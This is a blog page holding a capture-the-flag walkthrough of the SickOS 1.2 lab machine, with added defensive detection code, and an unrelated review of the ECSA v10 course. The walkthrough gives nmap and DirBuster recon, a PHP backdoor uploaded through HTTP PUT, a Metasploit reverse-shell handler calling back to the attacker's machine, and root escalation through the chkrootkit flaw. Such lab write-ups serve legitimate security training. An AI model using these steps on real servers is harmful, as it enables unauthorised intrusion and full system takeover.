Information Security

SickOS 1.2 Walkthrough

 

SickOS 1.2
This machine can be downloaded from:
Set the Network adapter to NAT if you are using VMware.
Scan for the target's local IP with the netdiscover command:
    netdiscover
IP: 192.168.236.136
It may differ in your lab.
1.png
Scan the target IP with nmap's default scan:
    nmap -A -vv -T4 192.168.236.136
2.png
We find two open ports: 22/tcp and 80/tcp.
Next, scan all TCP ports; for convenience we can use Zenmap:
  • Type zenmap to open the Zenmap tool
  • Type the IP in the Target field: 192.168.236.136
  • Choose the profile: Intense scan, all TCP ports
As shown in the screenshot, this runs:
    nmap -p 1-65535 -T4 -A -v 192.168.236.136
3.png
Scan all UDP ports:
  • Type the IP in the Target field: 192.168.236.136
  • Choose the profile: Intense scan plus UDP
4.png
The UDP scan didn't find any useful ports, so we go back to the TCP scan.
Since port 80 is open on the target, we browse to it.
We run nikto to scan the web server and look for directories on that host:
    nikto -h 192.168.236.136
5.png
Since nikto gives no useful result, we run DirBuster, a different tool for finding directories, with the medium wordlist:
  • Type http://192.168.236.136 in the Target URL field.
  • Check Go Faster to speed up the scan.
  • Choose the wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt.
  • Click Start.
6.png
DirBuster finds a “test” directory; let's open it in the browser.
Let's analyze the page and view its source.
Nothing useful there, so we check which HTTP methods the server allows, either via Burp Suite or with curl, by sending an OPTIONS request:
    curl -v -X OPTIONS http://192.168.236.136/test
7.png
Now that we know the PUT method is allowed, we can upload our shell either via Burp Suite or via Nmap.
Let's prepare the shell first.
I use a ready-made shell that ships with Kali, located with:
    locate shell
8.png
Copy the shell and rename it shell.php:
    cp /usr/share/webshells/php/php-backdoor.php /root/shell.php
Edit shell.php with:
    nano shell.php
9.png
    $ip = '192.168.236.135';
        >> Kali IP
    $port = 443;
        >> because 4444 isn't working
Then upload it with Nmap:
    nmap -p 80 192.168.236.136 --script http-put --script-args http-put.url='/test/shell.php',http-put.file='shell.php'
10.png
Successfully created!
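The PUT exposure used above, seen from the defender's side: an added example (not code from the original walkthrough) that parses the Allow header of an OPTIONS response and picks the OPTIONS probe and the PUT upload out of Apache access log lines. The HTTP response and log lines are constructed to mirror the steps described, not captured output.

```python
"""Defender-side view of the HTTP PUT exposure used in the walkthrough:
flag write-capable methods in an OPTIONS response's Allow header, and pick
the OPTIONS probe and PUT upload out of Apache access log lines.
All sample data below is constructed for this example."""
import re
from typing import Dict, List

# Methods that create, modify or delete server content; a static site
# needs only GET and HEAD (plus POST for forms).
WRITE_METHODS = {"PUT", "DELETE", "PATCH", "MOVE", "COPY", "MKCOL", "PROPPATCH"}

def risky_methods(options_response: str) -> List[str]:
    """Return write-capable methods advertised in an OPTIONS response."""
    for line in options_response.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "allow":
            allowed = {m.strip().upper() for m in value.split(",") if m.strip()}
            return sorted(allowed & WRITE_METHODS)
    return []  # no Allow header: nothing advertised

# Apache combined log: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def suspicious_requests(log_lines: List[str]) -> List[Dict[str, str]]:
    """Flag write methods (high if the server accepted them) and OPTIONS probes."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format, skip
        method, status = m["method"], m["status"]
        if method in WRITE_METHODS:
            severity = "high" if status.startswith("2") else "medium"
        elif method == "OPTIONS":
            severity = "low"  # reconnaissance; correlate with later writes
        else:
            continue
        hits.append({"ip": m["ip"], "method": method, "path": m["path"],
                     "status": status, "severity": severity})
    return hits

# Constructed samples modelled on the steps above, not captured output.
SAMPLE_OPTIONS = "HTTP/1.1 200 OK\r\nServer: Apache\r\nAllow: GET,HEAD,POST,OPTIONS,PUT\r\n\r\n"
SAMPLE_LOG = [
    '192.168.236.135 - - [15/Jan/2018:10:00:00 +0000] "OPTIONS /test HTTP/1.1" 200 - "-" "curl/7.58.0"',
    '192.168.236.135 - - [15/Jan/2018:10:00:05 +0000] "PUT /test/shell.php HTTP/1.1" 201 - "-" "Nmap Scripting Engine"',
    '192.168.236.135 - - [15/Jan/2018:10:00:10 +0000] "GET /test/shell.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
print(risky_methods(SAMPLE_OPTIONS), suspicious_requests(SAMPLE_LOG))
```

A PUT answered with 2xx on a path under the document root is the event to alert on; the OPTIONS probe from the same client shortly before it is the corroborating context.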
Now we have to set up a listener. There are two ways, nc -lvp 443 or Metasploit, but I prefer Metasploit for the privilege escalation later.
We use the payload php/reverse_php because we generated a plain shell, not Meterpreter, and that works for me.
Set the local host (Kali IP) and port (443) as we did in the shell previously.
Then we type exploit -jz to run the handler as a background job.
    msfconsole
    use exploit/multi/handler
    set payload php/reverse_php
    set LHOST 192.168.236.135
    set LPORT 443
    exploit -jz
11.png
Final options:
12.png
Then we trigger the shell by opening it in the browser:
13.png
Finally we got a shell!
But only as the unprivileged www-data user.
14.png
For privilege escalation, we first check what is running on the system with root privileges:
    ls -la
15.png
We saw that the chkrootkit line has root privileges:
    drwxr-xr-x  2 john john  4096 Apr 12  2016 chkrootkit-0.49
After searching Google for vulnerabilities, we discovered CVE-2014-0476 in chkrootkit; this could allow me to escalate my privileges with a Metasploit module:
  • use exploit/unix/local/chkrootkit
  • set session 1
Enter the commands shown in the image to load the exploit/unix/local/chkrootkit module, then set the session to 1 and an arbitrary LPORT such as 8080, and run the module.
For me, I set session 3 because I had already opened sessions 1 and 2.
16.png
Type info:
    info
17.png
Check the LPORT with the options command:
18.png
Then type run:
19.png
Session 4 opened, in my case.
Type id to see the privileges of the current account:
    id
20.png
Now we are root!
Open the 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt file for the final flag:
    cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
21.png
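The chkrootkit weakness used for the escalation above, from the host-hardening side: an added example, not the walkthrough's or the Metasploit module's code, that checks the installed version, a planted /tmp/update file and a root cron entry. The version string, crontab text and path are constructed, and the `chkrootkit version 0.49` format of `chkrootkit -V` output is an assumption.

```python
"""Host check for the chkrootkit weakness exploited above (CVE-2014-0476):
releases before 0.50 execute a file named /tmp/update with the privileges of
whoever runs chkrootkit, usually root via a daily cron job. Inputs are passed
in as text so this added example runs offline on constructed samples."""
import os
import re
import stat
from typing import Dict, Optional

FIXED_VERSION = (0, 50)  # first release without the /tmp/update behaviour

def is_vulnerable_version(version_output: str) -> bool:
    """Parse text such as 'chkrootkit version 0.49' (assumed -V format) and compare."""
    m = re.search(r"\b(\d+)\.(\d+)\b", version_output)
    return bool(m) and (int(m.group(1)), int(m.group(2))) < FIXED_VERSION

def planted_update_file(tmp_dir: str = "/tmp") -> Optional[str]:
    """Return tmp_dir/update if it is an executable regular file, else None."""
    path = os.path.join(tmp_dir, "update")
    try:
        st = os.lstat(path)  # lstat: do not follow a symlink planted there
    except OSError:
        return None
    exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    return path if stat.S_ISREG(st.st_mode) and st.st_mode & exec_bits else None

def root_cron_runs_chkrootkit(crontab_text: str) -> bool:
    """True if a system crontab line (min hour dom mon dow USER command) runs
    chkrootkit as root; per-user crontabs have no user field and are not handled."""
    for line in crontab_text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        if len(fields) >= 7 and fields[5] == "root" and "chkrootkit" in " ".join(fields[6:]):
            return True
    return False

def assess(version_output: str, crontab_text: str, tmp_dir: str = "/tmp") -> Dict[str, object]:
    """Combine the signals; 'exposed' means any local user who can write to
    tmp_dir gets code run as root on the next scheduled scan."""
    vuln = is_vulnerable_version(version_output)
    cron = root_cron_runs_chkrootkit(crontab_text)
    return {"vulnerable_version": vuln, "root_cron": cron,
            "planted_file": planted_update_file(tmp_dir), "exposed": vuln and cron}

# Constructed sample inputs, not output captured from the SickOS machine.
SAMPLE_VERSION = "chkrootkit version 0.49"
SAMPLE_CRONTAB = ("# m h dom mon dow user command\n"
                  "0 3 * * * root /usr/local/chkrootkit-0.49/chkrootkit\n")
```

On a real host, feed it the output of `chkrootkit -V`, the contents of /etc/crontab and /etc/cron.d/*, and the real /tmp; upgrading to 0.50 or later removes the root path regardless of what sits in /tmp.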
I hope you enjoyed it!
Contact me on Twitter:

ECSA v10 Review

ECSA (EC-Council Security Analyst) v10 Review:

 

Hi there,

Today I will write about ECSA (EC-Council Security Analyst), an advanced penetration testing course.

You can find official website of this course here:

www.eccouncil.org/programs/certified-security-analyst-ecsa/

 

This write-up describes my experience and does not necessarily cover all parts. Let's move to the prerequisites of this course:

You need CEH (course and practical) in the new version 10.
I had CEHv9 in Dec 2017.

The Course:
This course extends your knowledge from just knowing the information and tools to using what you learnt in CEH and reusing the tools with some advanced techniques.

When you look at the ECSA syllabus you will see interesting topics such as cloud hacking, IoT hacking, database hacking, and internal and external penetration testing, but the truth is different.

The Benefits:

To be honest, the golden key in this course is that it teaches you how to get engaged with the security industry, how to apply for a pen test project, and how to complete all the business paperwork before and after the proposal.

As EC-Council always does, their courses contain a lot of theoretical knowledge compared to the practical phase, and that's what makes their courses not good enough to take.

ECSA v10 has 16 modules plus 10 self-study modules, all of them just slide shows.
If you are looking for just deep information, you can enroll in it.

The practical section uses a website named iLab.
iLab is a virtual environment with Windows (Server / 8 / 10), Kali, Ubuntu and BackTrack machines, divided into company departments, for applying all the labs.

My Experience:
OK, so far we have covered the outline of the course, but not yet my experience and recommendations for ECSA.

I am planning to take OSCP, but I didn't feel my pentest skills were advanced enough after CEH to go for OSCP, and that's why I took ECSA to improve my current penetration testing experience.

The course, as I mentioned, contains a lot of theoretical information compared to practical, so if you are looking for a practical penetration testing course, you shouldn't be here.

The course repeats many labs from CEH, which is bad for me. I expected more advanced techniques rather than just using old and outdated tools, repeating the CEH labs exactly, and hacking with Metasploit.

To mention a detailed example: Nmap has one more bash script for scanning, which was new for me, and there is one exploit-editing exercise.

The modules contain some repeated labs: if we look at cloud, you will apply an XSS attack that was already in the web module.
If you look at the database lab, you will reuse SQL injection, but here just to retrieve a database table.

I faced a lot of issues in the SQL labs that did not work. In addition, when I contacted lab support they delayed replying, and finally the answer was to forward the issue to the related department, and that's it.

The screenshots and the results I got while applying the labs are very different.
In Wi-Fi hacking, as we all know, the known scenario is to break into an access point, or even to penetrate the router from outside to get into the local network.

But in truth, the lab is making a virus for old Android devices and then breaking the 4-way handshake, which is too far from just Wi-Fi hacking!

In version 10 they removed report writing and the hacking challenges and separated them into another course they call ECSA Practical, for commercial reasons.

After all, I finished the lab and, for the first time, I am not satisfied with a course, so I don't recommend that anyone who needs an advanced penetration testing course enroll in it.

I only recommend it for managers or those who just need the knowledge to work with pentesters, not to do penetration testing themselves.

When I evaluated the training course, they forwarded all the notes to the training center instead of reading them, investigating the reasons and trying to fix them.